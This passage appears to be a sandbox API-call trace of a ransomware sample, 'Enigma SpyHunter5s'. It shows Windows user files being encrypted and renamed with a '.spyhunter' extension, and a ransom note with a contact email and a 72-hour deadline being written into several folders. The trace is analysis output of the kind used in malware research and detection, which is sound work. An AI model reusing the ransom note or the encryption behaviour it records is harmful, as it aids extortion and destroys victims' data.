| out: hHeap=0x2c0000) returned 1 [0150.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.879] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.879] WriteFile (in: hFile=0xb0, lpBuffer=0x248edef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef18, lpOverlapped=0x0 | out: lpBuffer=0x248edef*, lpNumberOfBytesWritten=0x248ef18*=0x127, lpOverlapped=0x0) returned 1 [0150.880] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.880] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef18*=0x2ac, lpOverlapped=0x0) returned 1 [0150.880] CloseHandle (hObject=0xb0) returned 1 [0150.880] GetProcessHeap () returned 0x2c0000 [0150.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf550 | out: hHeap=0x2c0000) returned 1 [0150.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eeb8 | out: pbBuffer=0x248eeb8) returned 1 [0150.881] GetProcessHeap () returned 0x2c0000 [0150.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.881] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eeb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eeb0*=0x30) returned 1 [0150.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0150.882] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".txt") returned 0x0 [0150.882] GetProcessHeap () returned 0x2c0000 [0150.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.882] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ee74*=0xbdb, lpOverlapped=0x0) returned 1 [0150.892] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff425, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.892] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xbdb, lpNumberOfBytesWritten=0x248ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ee74*=0xbdb, lpOverlapped=0x0) returned 1 [0150.892] GetProcessHeap () returned 0x2c0000 [0150.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.892] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.893] WriteFile (in: hFile=0xb0, lpBuffer=0x248eeb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee74, lpOverlapped=0x0 | out: lpBuffer=0x248eeb4*, lpNumberOfBytesWritten=0x248ee74*=0x4, lpOverlapped=0x0) returned 1 [0150.893] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee74, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee74*=0x30, lpOverlapped=0x0) returned 1 [0150.893] CloseHandle (hObject=0xb0) returned 1 [0150.893] GetProcessHeap () returned 0x2c0000 [0150.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.893] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.spyhunter") returned 145 [0150.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.spyhunter")) returned 1 [0150.894] GetProcessHeap () returned 0x2c0000 [0150.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.894] GetProcessHeap () returned 0x2c0000 [0150.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.894] GetProcessHeap () returned 0x2c0000 [0150.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc43e8 | out: hHeap=0x2c0000) returned 1 [0150.894] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eeb0 | out: pbBuffer=0x248eeb0) returned 1 [0150.894] GetProcessHeap () returned 0x2c0000 [0150.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eea8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eea8*=0x30) returned 1 [0150.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0150.896] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".txt") returned 0x0 [0150.896] GetProcessHeap () returned 0x2c0000 [0150.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.896] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ee6c*=0xbdb, lpOverlapped=0x0) returned 1 [0151.093] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff425, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.094] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xbdb, lpNumberOfBytesWritten=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ee6c*=0xbdb, lpOverlapped=0x0) returned 1 [0151.094] GetProcessHeap () returned 0x2c0000 [0151.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.094] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.094] WriteFile (in: hFile=0xb0, lpBuffer=0x248eeac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x248eeac*, lpNumberOfBytesWritten=0x248ee6c*=0x4, lpOverlapped=0x0) returned 1 [0151.094] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee6c*=0x30, lpOverlapped=0x0) returned 1 [0151.094] CloseHandle (hObject=0xb0) returned 1 [0151.094] GetProcessHeap () returned 0x2c0000 [0151.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.094] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.spyhunter") returned 145 [0151.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.spyhunter")) returned 1 [0151.095] GetProcessHeap () returned 0x2c0000 [0151.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.095] GetProcessHeap () returned 0x2c0000 [0151.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.095] GetProcessHeap () returned 0x2c0000 [0151.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4290 | out: hHeap=0x2c0000) returned 1 [0151.095] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eeb0 | out: pbBuffer=0x248eeb0) returned 1 [0151.095] GetProcessHeap () returned 0x2c0000 [0151.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.095] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eea8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eea8*=0x30) returned 1 [0151.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0151.096] StrStrW (lpFirst="Data1.cab", lpSrch=".txt") returned 0x0 [0151.096] GetProcessHeap () returned 0x2c0000 [0151.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.096] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ee6c*=0x2800, lpOverlapped=0x0) returned 1 [0151.098] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.098] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ee6c*=0x2800, lpOverlapped=0x0) returned 1 [0151.098] GetProcessHeap () returned 0x2c0000 [0151.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.098] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.098] WriteFile (in: hFile=0xb0, lpBuffer=0x248eeac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x248eeac*, lpNumberOfBytesWritten=0x248ee6c*=0x4, lpOverlapped=0x0) returned 1 [0151.197] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee6c*=0x30, lpOverlapped=0x0) returned 1 [0151.197] CloseHandle (hObject=0xb0) returned 1 [0151.198] GetProcessHeap () returned 0x2c0000 [0151.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.198] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.spyhunter") returned 91 [0151.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.spyhunter")) returned 1 [0151.200] GetProcessHeap () returned 0x2c0000 [0151.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.200] GetProcessHeap () returned 0x2c0000 [0151.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.200] GetProcessHeap () returned 0x2c0000 [0151.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f636d8 | out: hHeap=0x2c0000) returned 1 [0151.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.203] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.203] WriteFile (in: hFile=0xb0, lpBuffer=0x248eddf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef08, lpOverlapped=0x0 | out: lpBuffer=0x248eddf*, lpNumberOfBytesWritten=0x248ef08*=0x127, lpOverlapped=0x0) returned 1 [0151.204] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.204] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef08*=0x2ac, lpOverlapped=0x0) returned 1 [0151.204] CloseHandle (hObject=0xb0) returned 1 [0151.204] GetProcessHeap () returned 0x2c0000 [0151.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39ae0 | out: hHeap=0x2c0000) returned 1 [0151.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.205] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.205] WriteFile (in: hFile=0xb0, lpBuffer=0x248eddb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x248eddb*, lpNumberOfBytesWritten=0x248ef04*=0x127, lpOverlapped=0x0) returned 1 [0151.206] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.206] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0151.206] CloseHandle (hObject=0xb0) returned 1 [0151.206] GetProcessHeap () returned 0x2c0000 [0151.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46128 | out: hHeap=0x2c0000) returned 1 [0151.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\si\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.207] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.207] WriteFile (in: hFile=0xb0, lpBuffer=0x248edd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef00, lpOverlapped=0x0 | out: lpBuffer=0x248edd7*, lpNumberOfBytesWritten=0x248ef00*=0x127, lpOverlapped=0x0) returned 1 [0151.208] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.208] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef00*=0x2ac, lpOverlapped=0x0) returned 1 [0151.209] CloseHandle (hObject=0xb0) returned 1 [0151.209] GetProcessHeap () returned 0x2c0000 [0151.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61618 | out: hHeap=0x2c0000) returned 1 [0151.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\security\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.209] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.209] WriteFile (in: hFile=0xb0, lpBuffer=0x248edd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x248edd3*, lpNumberOfBytesWritten=0x248eefc*=0x127, lpOverlapped=0x0) returned 1 [0151.210] lstrlenA 